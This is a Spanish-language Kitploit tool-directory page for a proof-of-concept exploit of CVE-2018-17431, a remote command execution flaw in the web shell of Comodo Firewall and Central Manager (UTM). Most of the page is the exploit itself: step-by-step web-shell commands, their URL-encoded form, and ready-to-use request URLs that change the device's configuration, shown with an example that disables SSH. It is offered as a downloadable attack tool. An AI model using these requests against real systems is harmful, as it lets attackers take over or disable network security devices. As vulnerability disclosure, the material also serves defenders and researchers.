Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-17431-Comodo — Comodo | Kitploit
Herramientas/GitHubGitHub/sanan2004/cve-2018-17431-comodo
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubsanan2004/cve-2018-17431-comodo

CVE-2018-17431-Comodo

Comodo

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-17431-PoC

Prueba de concepto para CVE-2018-17431

Título del Exploit: Comodo Firewall & Central Manager (UTM) todas las versiones anteriores a 2.7.0 y 1.5.0 Ejecución remota de comandos (basado en Web Shell)

Autor del Exploit: Milad Fadavvi

Página del proveedor: https://www.comodo.com/

Enlace del software: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

Versión: anterior a 2.7.0 y 1.5.0

Probado en: Windows:firefox/chrome - Kali:firefox

Fecha de descubrimiento: 2018-08-15 (reportado el mismo día)

Confirmación de que el error existe: 2018-09-22 (ID del ticket: XWR-503-79437)

Exploit:

  1. Simulación de WebShell:

    root@kitploit:~
     For example disable SSH in web shell is like this:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. Codificar

    root@kitploit:~
     make above sequense encode with URL ECODING
     (I used burp encoder plugin)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. Ejecutar

    root@kitploit:~
     Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (extra enter key for run the command)
               
    
     Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

Aparecerá una página con el mensaje "Configuration has been altered" y la configuración habrá cambiado.

Con esta técnica, podemos simular todos los comandos de WebShell.

Descargar herramienta